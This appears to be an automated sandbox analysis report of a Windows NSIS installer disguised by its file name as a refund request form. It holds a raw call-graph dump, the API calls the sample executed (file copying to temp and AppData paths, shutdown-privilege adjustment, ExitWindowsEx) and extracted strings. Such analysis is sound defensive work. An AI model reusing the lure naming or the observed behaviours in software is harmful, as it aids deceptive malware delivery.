3471 403a57 3470->3471 3472 403aeb 3471->3472 3475 406188 3 API calls 3471->3475 3473 405c97 18 API calls 3472->3473 3474 403af1 3473->3474 3477 403b01 LoadImageW 3474->3477 3478 4062dc 17 API calls 3474->3478 3476 403a89 3475->3476 3476->3472 3481 403aaa lstrlenW 3476->3481 3485 405bbc CharNextW 3476->3485 3479 403ba7 3477->3479 3480 403b28 RegisterClassW 3477->3480 3478->3477 3484 40140b 2 API calls 3479->3484 3482 403bb1 3480->3482 3483 403b5e SystemParametersInfoW CreateWindowExW 3480->3483 3486 403ab8 lstrcmpiW 3481->3486 3487 403ade 3481->3487 3482->3412 3483->3479 3488 403bad 3484->3488 3489 403aa7 3485->3489 3486->3487 3490 403ac8 GetFileAttributesW 3486->3490 3491 405b8f 3 API calls 3487->3491 3488->3482 3493 403c80 18 API calls 3488->3493 3489->3481 3492 403ad4 3490->3492 3494 403ae4 3491->3494 3492->3487 3495 405bdb 2 API calls 3492->3495 3496 403bbe 3493->3496 3576 4062ba lstrcpynW 3494->3576 3495->3487 3498 403bca ShowWindow 3496->3498 3499 403c4d 3496->3499 3501 406624 3 API calls 3498->3501 3500 4053f5 5 API calls 3499->3500 3503 403c53 3500->3503 3502 403be2 3501->3502 3504 403bf0 GetClassInfoW 3502->3504 3507 406624 3 API calls 3502->3507 3505 403c57 3503->3505 3506 403c6f 3503->3506 3509 403c04 GetClassInfoW RegisterClassW 3504->3509 3510 403c1a DialogBoxParamW 3504->3510 3505->3482 3512 40140b 2 API calls 3505->3512 3508 40140b 2 API calls 3506->3508 3507->3504 3508->3482 3509->3510 3511 40140b 2 API calls 3510->3511 3511->3482 3512->3482 3513->3361 3578 4062ba lstrcpynW 3514->3578 3516 405ca8 3517 405c3a 4 API calls 3516->3517 3518 405cae 3517->3518 3519 4036d0 3518->3519 3520 40654e 5 API calls 3518->3520 3519->3412 3528 4062ba lstrcpynW 3519->3528 3526 405cbe 3520->3526 3521 405cef lstrlenW 3522 405cfa 3521->3522 3521->3526 3523 405b8f 3 API calls 3522->3523 3525 405cff GetFileAttributesW 3523->3525 3524 4065fd 2 API calls 3524->3526 3525->3519 3526->3519 3526->3521 3526->3524 3527 405bdb 2 API calls 3526->3527 3527->3521 3528->3392 3529->3399 3531 4038e8 3530->3531 3532 4038da CloseHandle 3530->3532 3579 403915 3531->3579 3532->3531 3537->3402 3538->3414 3540 4060a1 3539->3540 3541 406094 3539->3541 3540->3414 3629 405f06 3541->3629 3544 405dec GetTickCount GetTempFileNameW 3543->3544 3545 405e22 3544->3545 3546 40338d 3544->3546 3545->3544 3545->3546 3546->3349 3547->3431 3548->3433 3550 405be9 3549->3550 3551 402f49 3550->3551 3552 405bef CharPrevW 3550->3552 3553 4062ba lstrcpynW 3551->3553 3552->3550 3552->3551 3553->3437 3555 402e82 3554->3555 3556 402e9a 3554->3556 3557 402e92 3555->3557 3558 402e8b DestroyWindow 3555->3558 3559 402ea2 3556->3559 3560 402eaa GetTickCount 3556->3560 3557->3440 3558->3557 3561 4066d0 2 API calls 3559->3561 3562 402eb8 CreateDialogParamW ShowWindow 3560->3562 3563 402edb 3560->3563 3564 402ea8 3561->3564 3562->3563 3563->3440 3564->3440 3565->3448 3566->3447 3568 403c94 3567->3568 3577 406201 wsprintfW 3568->3577 3570 403d05 3571 403d39 18 API calls 3570->3571 3573 403d0a 3571->3573 3572 403a35 3572->3470 3573->3572 3574 4062dc 17 API calls 3573->3574 3574->3573 3575->3466 3576->3472 3577->3570 3578->3516 3580 403923 3579->3580 3581 4038ed 3580->3581 3582 403928 FreeLibrary GlobalFree 3580->3582 3583 4059cc 3581->3583 3582->3581 3582->3582 3584 405c97 18 API calls 3583->3584 3585 4059ec 3584->3585 3586 4059f4 DeleteFileW 3585->3586 3587 405a0b 3585->3587 3616 403703 OleUninitialize 3586->3616 3588 405b2b 3587->3588 3619 4062ba lstrcpynW 3587->3619 3595 4065fd 2 API calls 3588->3595 3588->3616 3590 405a31 3591 405a44 3590->3591 3592 405a37 lstrcatW 3590->3592 3594 405bdb 2 API calls 3591->3594 3593 405a4a 3592->3593 3596 405a5a lstrcatW 3593->3596 3598 405a65 lstrlenW FindFirstFileW 3593->3598 3594->3593 3597 405b50 3595->3597 3596->3598 3599 405b8f 3 API calls 3597->3599 3597->3616 3598->3588 3612 405a87 3598->3612 3600 405b5a 3599->3600 3601 405984 5 API calls 3600->3601 3604 405b66 3601->3604 3603 405b0e FindNextFileW 3605 405b24 FindClose 3603->3605 3603->3612 3606 405b80 3604->3606 3607 405b6a 3604->3607 3605->3588 3609 405322 24 API calls 3606->3609 3610 405322 24 API calls 3607->3610 3607->3616 3609->3616 3613 405b77 3610->3613 3611 4059cc 60 API calls 3611->3612 3612->3603 3612->3611 3614 405322 24 API calls 3612->3614 3617 405322 24 API calls 3612->3617 3618 406080 36 API calls 3612->3618 3620 4062ba lstrcpynW 3612->3620 3621 405984 3612->3621 3615 406080 36 API calls 3613->3615 3614->3603 3615->3616 3616->3368 3616->3369 3617->3612 3618->3612 3619->3590 3620->3612 3622 405d8b 2 API calls 3621->3622 3623 405990 3622->3623 3624 4059a7 DeleteFileW 3623->3624 3625 40599f RemoveDirectoryW 3623->3625 3626 4059b1 3623->3626 3627 4059ad 3624->3627 3625->3627 3626->3612 3627->3626 3628 4059bd SetFileAttributesW 3627->3628 3628->3626 3630 405f36 3629->3630 3631 405f5c GetShortPathNameW 3629->3631 3656 405db0 GetFileAttributesW CreateFileW 3630->3656 3632 405f71 3631->3632 3633 40607b 3631->3633 3632->3633 3635 405f79 wsprintfA 3632->3635 3633->3540 3637 4062dc 17 API calls 3635->3637 3636 405f40 CloseHandle GetShortPathNameW 3636->3633 3638 405f54 3636->3638 3639 405fa1 3637->3639 3638->3631 3638->3633 3657 405db0 GetFileAttributesW CreateFileW 3639->3657 3641 405fae 3641->3633 3642 405fbd GetFileSize GlobalAlloc 3641->3642 3643 406074 CloseHandle 3642->3643 3644 405fdf 3642->3644 3643->3633 3645 405e33 ReadFile 3644->3645 3646 405fe7 3645->3646 3646->3643 3658 405d15 lstrlenA 3646->3658 3649 406012 3651 405d15 4 API calls 3649->3651 3650 405ffe lstrcpyA 3652 406020 3650->3652 3651->3652 3653 406057 SetFilePointer 3652->3653 3654 405e62 WriteFile 3653->3654 3655 40606d GlobalFree 3654->3655 3655->3643 3656->3636 3657->3641 3659 405d56 lstrlenA 3658->3659 3660 405d5e 3659->3660 3661 405d2f lstrcmpiA 3659->3661 3660->3649 3660->3650 3661->3660 3662 405d4d CharNextA 3661->3662 3662->3659 4054 40190f 4055 402c41 17 API calls 4054->4055 4056 401916 4055->4056 4057 405920 MessageBoxIndirectW 4056->4057 4058 40191f 4057->4058 4059 401491 4060 405322 24 API calls 4059->4060 4061 401498 4060->4061 4062 401d14 4063 402c1f 17 API calls 4062->4063 4064 401d1b 4063->4064 4065 402c1f 17 API calls 4064->4065 4066 401d27 GetDlgItem 4065->4066 4067 402592 4066->4067 4068 405296 4069 4052a6 4068->4069 4070 4052ba 4068->4070 4072 4052ac 4069->4072 4080 405303 4069->4080 4071 4052c2 IsWindowVisible 4070->4071 4078 4052d9 4070->4078 4073 4052cf 4071->4073 4071->4080 4075 40427d SendMessageW 4072->4075 4081 404bec SendMessageW 4073->4081 4074 405308 CallWindowProcW 4076 4052b6 4074->4076 4075->4076 4078->4074 4086 404c6c 4078->4086 4080->4074 4082 404c4b SendMessageW 4081->4082 4083 404c0f GetMessagePos ScreenToClient SendMessageW 4081->4083 4084 404c43 4082->4084 4083->4084 4085 404c48 4083->4085 4084->4078 4085->4082 4095 4062ba lstrcpynW 4086->4095 4088 404c7f 4096 406201 wsprintfW 4088->4096 4090 404c89 4091 40140b 2 API calls 4090->4091 4092 404c92 4091->4092 4097 4062ba lstrcpynW 4092->4097 4094 404c99 4094->4080 4095->4088 4096->4090 4097->4094 4098 402598 4099 4025c7 4098->4099 4100 4025ac 4098->4100 4102 4025fb 4099->4102 4103 4025cc 4099->4103 4101 402c1f 17 API calls 4100->4101 4108 4025b3 4101->4108 4105 402c41 17 API calls 4102->4105 4104 402c41 17 API calls 4103->4104 4106 4025d3 WideCharToMultiByte lstrlenA 4104->4106 4107 402602 lstrlenW 4105->4107 4106->4108 4107->4108 4109 40262f 4108->4109 4110 402645 4108->4110 4112 405e91 5 API calls 4108->4112 4109->4110 4111 405e62 WriteFile 4109->4111 4111->4110 4112->4109 4113 404c9e GetDlgItem GetDlgItem 4114 404cf0 7 API calls 4113->4114 4121 404f09 4113->4121 4115 404d93 DeleteObject 4114->4115 4116 404d86 SendMessageW 4114->4116 4117 404d9c 4115->4117 4116->4115 4119 404dd3 4117->4119 4120 4062dc 17 API calls 4117->4120 4118 404fed 4123 405099 4118->4123 4134 405046 SendMessageW 4118->4134 4156 404efc 4118->4156 4122 404231 18 API calls 4119->4122 4125 404db5 SendMessageW SendMessageW 4120->4125 4121->4118 4124 404f7a 4121->4124 4132 404bec 5 API calls 4121->4132 4128 404de7 4122->4128 4126 4050a3 SendMessageW 4123->4126 4127 4050ab 4123->4127 4124->4118 4130 404fdf SendMessageW 4124->4130 4125->4117 4126->4127 4131 4050d4 4127->4131 4136 4050c4 4127->4136 4137 4050bd ImageList_Destroy 4127->4137 4133 404231 18 API calls 4128->4133 4129 404298 8 API calls 4135 40528f 4129->4135 4130->4118 4139 405243 4131->4139 4155 404c6c 4 API calls 4131->4155 4160 40510f 4131->4160 4132->4124 4138 404df5 4133->4138 4140 40505b SendMessageW 4134->4140 4134->4156 4136->4131 4141 4050cd GlobalFree 4136->4141 4137->4136 4142 404eca GetWindowLongW SetWindowLongW 4138->4142 4149 404ec4 4138->4149 4152 404e45 SendMessageW 4138->4152 4153 404e81 SendMessageW 4138->4153 4154 404e92 SendMessageW 4138->4154 4143 405255 ShowWindow GetDlgItem ShowWindow 4139->4143 4139->4156 4145 40506e 4140->4145 4141->4131 4144 404ee3 4142->4144 4143->4156 4146 404f01 4144->4146 4147 404ee9 ShowWindow 4144->4147 4148 40507f SendMessageW 4145->4148 4165 404266 SendMessageW 4146->4165 4164 404266 SendMessageW 4147->4164 4148->4123 4149->4142 4149->4144 4152->4138 4153->4138 4154->4138 4155->4160 4156->4129 4157 405219 InvalidateRect 4157->4139 4158 40522f 4157->4158 4166 404ba7 4158->4166 4159 40513d SendMessageW 4163 405153 4159->4163 4160->4159 4160->4163 4162 4051c7 SendMessageW SendMessageW 4162->4163 4163->4157 4163->4162 4164->4156 4165->4121 4169 404ade 4166->4169 4168 404bbc 4168->4139 4170 404af7 4169->4170 4171 4062dc 17 API calls 4170->4171 4172 404b5b 4171->4172 4173 4062dc 17 API calls 4172->4173 4174 404b66 4173->4174 4175 4062dc 17 API calls 4174->4175 4176 404b7c lstrlenW wsprintfW SetDlgItemTextW 4175->4176 4176->4168 4177 40149e 4178 4022f7 4177->4178 4179 4014ac PostQuitMessage 4177->4179 4179->4178 4180 401c1f 4181 402c1f 17 API calls 4180->4181 4182 401c26 4181->4182 4183 402c1f 17 API calls 4182->4183 4184 401c33 4183->4184 4185 401c48 4184->4185 4186 402c41 17 API calls 4184->4186 4187 401c58 4185->4187 4188 402c41 17 API calls 4185->4188 4186->4185 4189 401c63 4187->4189 4190 401caf 4187->4190 4188->4187 4192 402c1f 17 API calls 4189->4192 4191 402c41 17 API calls 4190->4191 4193 401cb4 4191->4193 4194 401c68 4192->4194 4195 402c41 17 API calls 4193->4195 4196 402c1f 17 API calls 4194->4196 4197 401cbd FindWindowExW 4195->4197 4198 401c74 4196->4198 4201 401cdf 4197->4201 4199 401c81 SendMessageTimeoutW 4198->4199 4200 401c9f SendMessageW 4198->4200 4199->4201 4200->4201 4202 402aa0 SendMessageW 4203 402aba InvalidateRect 4202->4203 4204 402ac5 4202->4204 4203->4204 4205 402821 4206 402827 4205->4206 4207 402ac5 4206->4207 4208 40282f FindClose 4206->4208 4208->4207 4209 4043a1 lstrlenW 4210 4043c0 4209->4210 4211 4043c2 WideCharToMultiByte 4209->4211 4210->4211 4212 404722 4213 40474e 4212->4213 4214 40475f 4212->4214 4273 405904 GetDlgItemTextW 4213->4273 4216 40476b GetDlgItem 4214->4216 4222 4047ca 4214->4222 4218 40477f 4216->4218 4217 404759 4220 40654e 5 API calls 4217->4220 4221 404793 SetWindowTextW 4218->4221 4229 405c3a 4 API calls 4218->4229 4219 4048ae 4223 404a5d 4219->4223 4275 405904 GetDlgItemTextW 4219->4275 4220->4214 4225 404231 18 API calls 4221->4225 4222->4219 4222->4223 4226 4062dc 17 API calls 4222->4226 4228 404298 8 API calls 4223->4228 4230 4047af 4225->4230 4231 40483e SHBrowseForFolderW 4226->4231 4227 4048de 4232 405c97 18 API calls 4227->4232 4233 404a71 4228->4233 4234 404789 4229->4234 4235 404231 18 API calls 4230->4235 4231->4219 4236 404856 CoTaskMemFree 4231->4236 4237 4048e4 4232->4237 4234->4221 4240 405b8f 3 API calls 4234->4240 4238 4047bd 4235->4238 4239 405b8f 3 API calls 4236->4239 4276 4062ba lstrcpynW 4237->4276 4274 404266 SendMessageW 4238->4274 4242 404863 4239->4242 4240->4221 4245 40489a SetDlgItemTextW 4242->4245 4249 4062dc 17 API calls 4242->4249 4244 4047c3 4247 406694 5 API calls 4244->4247 4245->4219 4246 4048fb 4248 406694 5 API calls 4246->4248 4247->4222 4256 404902 4248->4256 4250 404882 lstrcmpiW 4249->4250 4250->4245 4253 404893 lstrcatW 4250->4253 4251 404943 4277 4062ba lstrcpynW 4251->4277 4253->4245 4254 40494a 4255 405c3a 4 API calls 4254->4255 4257 404950 GetDiskFreeSpaceW 4255->4257 4256->4251 4259 405bdb 2 API calls 4256->4259 4261 40499b 4256->4261 4260 404974 MulDiv 4257->4260 4257->4261 4259->4256 4260->4261 4262 404a0c 4261->4262 4263 404ba7 20 API calls 4261->4263 4264 404a2f 4262->4264 4266 40140b 2 API calls 4262->4266 4265 4049f9 4263->4265 4278 404253 KiUserCallbackDispatcher 4264->4278 4268 404a0e SetDlgItemTextW 4265->4268 4269 4049fe 4265->4269 4266->4264 4268->4262 4271 404ade 20 API calls 4269->4271 4270 404a4b 4270->4223 4272 40467b SendMessageW 4270->4272 4271->4262 4272->4223 4273->4217 4274->4244 4275->4227 4276->4246 4277->4254 4278->4270 4279 4015a3 4280 402c41 17 API calls 4279->4280 4281 4015aa SetFileAttributesW 4280->4281 4282 4015bc 4281->4282 4283 4028ad 4284 402c41 17 API calls 4283->4284 4286 4028bb 4284->4286 4285 4028d1 4288 405d8b 2 API calls 4285->4288 4286->4285 4287 402c41 17 API calls 4286->4287 4287->4285 4289 4028d7 4288->4289 4311 405db0 GetFileAttributesW CreateFileW 4289->4311 4291 4028e4 4292 4028f0 GlobalAlloc 4291->4292 4293 402987 4291->4293 4294 402909 4292->4294 4295 40297e CloseHandle 4292->4295 4296 4029a2 4293->4296 4297 40298f DeleteFileW 4293->4297 4312 403347 SetFilePointer 4294->4312 4295->4293 4297->4296 4299 40290f 4300 403331 ReadFile 4299->4300 4301 402918 GlobalAlloc 4300->4301 4302 402928 4301->4302 4303 40295c 4301->4303 4304 403116 31 API calls 4302->4304 4305 405e62 WriteFile 4303->4305 4307 402935 4304->4307 4306 402968 GlobalFree 4305->4306 4308 403116 31 API calls 4306->4308 4309 402953 GlobalFree 4307->4309 4310 40297b 4308->4310 4309->4303 4310->4295 4311->4291 4312->4299 4313 401a30 4314 402c41 17 API calls 4313->4314 4315 401a39 ExpandEnvironmentStringsW 4314->4315 4316 401a4d 4315->4316 4318 401a60 4315->4318 4317 401a52 lstrcmpW 4316->4317 4316->4318 4317->4318 4319 402032 4320 402044 4319->4320 4321 4020f6 4319->4321 4322 402c41 17 API calls 4320->4322 4323 401423 24 API calls 4321->4323 4324 40204b 4322->4324 4325 402250 4323->4325 4326 402c41 17 API calls 4324->4326 4327 402054 4326->4327 4328 40206a LoadLibraryExW 4327->4328 4329 40205c GetModuleHandleW 4327->4329 4328->4321 4330 40207b 4328->4330 4329->4328 4329->4330 4339 406703 WideCharToMultiByte 4330->4339 4333 4020c5 4335 405322 24 API calls 4333->4335 4334 40208c 4336 401423 24 API calls 4334->4336 4337 40209c 4334->4337 4335->4337 4336->4337 4337->4325 4338 4020e8 FreeLibrary 4337->4338 4338->4325 4340 40672d GetProcAddress 4339->4340 4341 402086 4339->4341 4340->4341 4341->4333 4341->4334 4347 401735 4348 402c41 17 API calls 4347->4348 4349 40173c SearchPathW 4348->4349 4350 401757 4349->4350 4351 402a35 4352 402c1f 17 API calls 4351->4352 4353 402a3b 4352->4353 4354 402a72 4353->4354 4356 40288b 4353->4356 4357 402a4d 4353->4357 4355 4062dc 17 API calls 4354->4355 4354->4356 4355->4356 4357->4356 4359 406201 wsprintfW 4357->4359 4359->4356 4360 4014b8 4361 4014be 4360->4361 4362 401389 2 API calls 4361->4362 4363 4014c6 4362->4363 4364 401db9 GetDC 4365 402c1f 17 API calls 4364->4365 4366 401dcb GetDeviceCaps MulDiv ReleaseDC 4365->4366 4367 402c1f 17 API calls 4366->4367 4368 401dfc 4367->4368 4369 4062dc 17 API calls 4368->4369 4370 401e39 CreateFontIndirectW 4369->4370 4371 402592 4370->4371 4372 40283b 4373 402843 4372->4373 4374 402847 FindNextFileW 4373->4374 4377 402859 4373->4377 4375 4028a0 4374->4375 4374->4377 4378 4062ba lstrcpynW 4375->4378 4378->4377

                                                                                                                                      Executed Functions

                                                                                                                                      Function 0040338F Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 42 4034f5-40352e 36->42 43 4034dc-4034e4 36->43 54 40359c-40359d 37->54 55 40359e-4035a4 37->55 56 403653-403659 38->56 57 4036fe-40370e call 4038d0 OleUninitialize 38->57 39->38 53 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->53 49 403530-403535 42->49 50 40354b-403585 42->50 47 4034e6-4034e9 43->47 48 4034eb 43->48 47->42 47->48 48->42 49->50 58 403537-40353f 49->58 50->37 52 403587-40358b 50->52 52->37 59 4035ac-4035ba call 4062ba 52->59 53->38 53->57 54->55 55->28 61 4035aa 55->61 62 4036ee-4036f5 call 4039aa 56->62 63 40365f-40366a call 405bbc 56->63 75 403834-40383a 57->75 76 403714-403724 call 405920 ExitProcess 57->76 65 403541-403544 58->65 66 403546 58->66 68 4035bf 59->68 61->68 74 4036fa 62->74 79 4036b8-4036c2 63->79 80 40366c-4036a1 63->80 65->50 65->66 66->50 68->29 74->57 77 4038b8-4038c0 75->77 78 40383c-403852 GetCurrentProcess OpenProcessToken 75->78 88 4038c2 77->88 89 4038c6-4038ca ExitProcess 77->89 85 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 78->85 86 403888-403896 call 406694 78->86 82 4036c4-4036d2 call 405c97 79->82 83 40372a-40373e call 40588b lstrcatW 79->83 87 4036a3-4036a7 80->87 82->57 99 4036d4-4036ea call 4062ba * 2 82->99 100 403740-403746 lstrcatW 83->100 101 40374b-403765 lstrcatW lstrcmpiW 83->101 85->86 102 4038a4-4038af ExitWindowsEx 86->102 103 403898-4038a2 86->103 93 4036b0-4036b4 87->93 94 4036a9-4036ae 87->94 88->89 93->87 98 4036b6 93->98 94->93 94->98 98->79 99->62 100->101 101->57 105 403767-40376a 101->105 102->77 106 4038b1-4038b3 call 40140b 102->106 103->102 103->106 108 403773 call 40586e 105->108 109 40376c-403771 call 4057f1 105->109 106->77 117 403778-403786 SetCurrentDirectoryW 108->117 109->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 129 403828-40382f call 406080 126->129 127->126 128 4037f1-403811 call 406080 call 4062dc call 4058a3 127->128 128->126 138 403813-40381a CloseHandle 128->138 129->57 138->126
                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                      • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                      • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                      • GetCommandLineW.KERNEL32(Skolemoden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000020,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                        • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Skolemoden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                      • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                      • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                      • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                      • String ID: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\argoters\Necrotizing$C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets$C:\Users\user\Desktop$C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Skolemoden Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                      • API String ID: 3441113951-40989152
                                                                                                                                      • Opcode ID: 418f7ce21fe45f15723f9083b8ef212d9f55cacd26bf177e771f1ddffbd24179
                                                                                                                                      • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                      • Opcode Fuzzy Hash: 418f7ce21fe45f15723f9083b8ef212d9f55cacd26bf177e771f1ddffbd24179
                                                                                                                                      • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                                                                                      Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                      Download Yara Rule

